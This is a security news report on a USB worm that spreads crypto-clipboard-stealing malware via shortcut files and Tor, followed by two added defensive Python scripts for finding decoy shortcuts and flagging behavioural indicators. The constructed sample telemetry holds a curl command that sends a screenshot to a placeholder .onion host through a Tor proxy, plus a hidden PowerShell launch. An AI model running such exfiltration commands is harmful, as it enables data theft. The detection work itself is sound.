USB Worm Spreads Crypto-Stealing Malware via Windows Shortcut Files
A USB worm is spreading clipboard-stealing malware that targets cryptocurrency wallets by abusing Windows shortcut (.LNK) files and using Tor for stealthy C2 communication.

A new USB worm campaign is actively distributing clipboard-stealing malware that targets cryptocurrency wallets, leveraging Windows shortcut (.LNK) files for initial infection and the Tor network to conceal command-and-control (C2) traffic. The campaign, active since at least February 2026, has been detailed by Microsoft researchers who uncovered its sophisticated self-replication mechanism and data-stealing capabilities.
The infection chain begins when a victim opens a malicious LNK file on a USB drive, which triggers the malware to download additional payloads from a .ONION address. Once executed, the malware performs a local scan for document files, hiding the originals and replacing them with malicious shortcuts bearing the same names. This ensures that when users attempt to open their documents, the malware executes again, perpetuating the infection.
The worm component creates a scheduled task that monitors for newly connected USB storage devices. When a removable drive is detected, the malware copies itself to the device and creates additional malicious shortcut files, enabling self-propagation across systems. This worm-like behavior allows the malware to spread rapidly within organizations where USB drives are commonly shared.
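The document-shadowing trick described above leaves a simple on-disk footprint: a shortcut whose visible name matches a document sitting (hidden) in the same folder. The following triage script, an added example not taken from the article or from Microsoft's report, walks a drive and flags that pattern. The sample directory tree it builds is constructed for illustration, and the "hidden" check uses the Windows hidden attribute where available and falls back to a dot prefix elsewhere, which is an assumption made so the script also runs on non-Windows hosts.

```python
"""Triage a (USB) drive for document names shadowed by same-named .LNK files.

Added example for defenders: it does not parse or execute shortcuts, it only
reports file-name patterns that match the infection described in the article.
"""
import os
import stat
import tempfile
from pathlib import Path

# Extensions a decoy shortcut would typically imitate (illustrative list).
DOCUMENT_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx",
                 ".pdf", ".txt", ".rtf"}


def is_hidden(path: Path) -> bool:
    """Hidden via the Windows attribute (on Windows) or a leading dot elsewhere."""
    st = path.stat()
    attrs = getattr(st, "st_file_attributes", 0)          # Windows only
    if attrs & getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0):
        return True
    return path.name.startswith(".")


def find_decoy_shortcuts(root):
    """Return (finding_kind, lnk_path, original_is_hidden) tuples under root.

    shortcut_shadows_file   : report.docx.lnk sits next to report.docx
    document_named_shortcut : budget.xlsx.lnk with no budget.xlsx present
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        names = set(files)
        for name in files:
            if not name.lower().endswith(".lnk"):
                continue
            lnk = Path(dirpath) / name
            decoy = name[:-4]        # what Explorer shows with extensions hidden
            if decoy in names:
                original = Path(dirpath) / decoy
                findings.append(("shortcut_shadows_file", str(lnk),
                                 is_hidden(original)))
            elif Path(decoy).suffix.lower() in DOCUMENT_EXTS:
                findings.append(("document_named_shortcut", str(lnk), False))
    return findings


def build_sample_tree():
    """Constructed sample drive layout for a stand-alone run (not real data)."""
    root = Path(tempfile.mkdtemp(prefix="usb_triage_"))
    (root / "work").mkdir()
    for rel in ("work/report.docx",       # original document (would be hidden)
                "work/report.docx.lnk",   # decoy shortcut with the same name
                "work/budget.xlsx.lnk",   # decoy whose original is gone
                "app.lnk"):               # ordinary shortcut, should not flag
        (root / rel).write_bytes(b"placeholder")
    return root


if __name__ == "__main__":
    for kind, path, hidden in find_decoy_shortcuts(build_sample_tree()):
        print(f"{kind:25} {path}  original_hidden={hidden}")
```

Run it against the mount point of a suspect drive instead of the constructed tree; a hit is a reason to pull the drive and collect the shortcut for analysis, not proof of infection by itself, since users do occasionally create shortcuts next to documents.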
The stealer component activates only after verifying that Task Manager is not running, then establishes communication with the C2 server via a Tor executable (ugate.exe). Every half-second, the malware checks the clipboard for cryptocurrency-related data, including 12-word and 24-word BIP39 seed phrases, Ethereum private keys, Bitcoin WIF keys, and wallet addresses for Bitcoin, Ethereum (Tron), and Monero. The attacker's replacement address is chosen so that its leading characters match those of the victim's original address, reducing the chance that the user notices the swap while completing a transaction.
Beyond clipboard monitoring, the malware captures five screenshots of the victim's screen every ten seconds and exfiltrates them to the C2 server using the curl tool. Microsoft also noted support for remote code execution via a C2 EVAL instruction, which downloads and executes JavaScript content on the infected machine.
Microsoft recommends that defenders focus on behavioral indicators rather than signature-based detection. Key red flags include unusual process activity for wscript.exe and cscript.exe, unexpected launches of curl, PowerShell, and cmd.exe, and connections to 'localhost:9050' or other Tor proxy activity. The campaign underscores the evolving threat to cryptocurrency users, combining a physical USB vector with network-level stealth to bypass traditional security controls.
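The behavioral indicators listed above translate directly into detection logic over endpoint telemetry. The script below is an added example, not code from the article or from Microsoft, that runs three such rules over a handful of constructed process-creation and network-connection events in a Sysmon-like shape. The event field names, the "non-system drive letter means removable media" heuristic, and the sample command lines are all assumptions made for the illustration.

```python
"""Behavioral rules for the USB-worm indicators: script hosts launched from a
non-system drive, curl/PowerShell/cmd spawned by a script host, and traffic to
the local Tor SOCKS port. Added example; the events are constructed samples."""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SPAWN_WATCHLIST = {"curl.exe", "powershell.exe", "cmd.exe"}
TOR_SOCKS_PORT = 9050
LOOPBACK = {"127.0.0.1", "::1", "localhost"}
# Assumption: anything other than C:\ is treated as removable media.
NON_SYSTEM_DRIVE = re.compile(r"(?<![A-Za-z])[D-Z]:\\", re.IGNORECASE)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def detect(events):
    """Return (rule_name, event_index) pairs for every event that trips a rule."""
    hits = []
    for i, ev in enumerate(events):
        if ev["event"] == "process_create":
            image, parent = basename(ev["image"]), basename(ev["parent"])
            cmd = ev["cmdline"]
            if image in SCRIPT_HOSTS and NON_SYSTEM_DRIVE.search(cmd):
                hits.append(("script_host_from_removable_drive", i))
            if image in SPAWN_WATCHLIST and parent in SCRIPT_HOSTS:
                hits.append(("watchlist_binary_spawned_by_script_host", i))
            if "socks" in cmd.lower() and str(TOR_SOCKS_PORT) in cmd:
                hits.append(("socks_proxy_on_command_line", i))
        elif ev["event"] == "network_connect":
            if ev["dest"] in LOOPBACK and ev["port"] == TOR_SOCKS_PORT:
                hits.append(("tor_socks_proxy_connection", i))
    return hits


SYS32 = r"C:\Windows\System32"
# Constructed sample telemetry (not real logs). Index 3 and 4 are benign.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": SYS32 + r"\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe //B "E:\loader.js"'},
    {"event": "process_create", "image": SYS32 + r"\curl.exe",
     "parent": SYS32 + r"\wscript.exe",
     "cmdline": "curl.exe --socks5-hostname 127.0.0.1:9050 "
                "-F file=@shot.png http://placeholder.onion/up"},
    {"event": "network_connect", "image": SYS32 + r"\curl.exe",
     "dest": "127.0.0.1", "port": 9050},
    {"event": "process_create", "image": SYS32 + r"\cmd.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe /c dir"},
    {"event": "network_connect",
     "image": r"C:\Program Files\Browser\browser.exe",
     "dest": "203.0.113.10", "port": 443},
    {"event": "process_create",
     "image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "parent": SYS32 + r"\cscript.exe",
     "cmdline": "powershell.exe -nop -w hidden"},
]

if __name__ == "__main__":
    for rule, idx in detect(SAMPLE_EVENTS):
        print(f"event[{idx}] -> {rule}")
```

Each rule is deliberately narrow (a parent-child pair, a loopback port) so it can be tuned independently; in production the "removable drive" heuristic should be replaced by the drive-type information the EDR or Sysmon configuration actually provides.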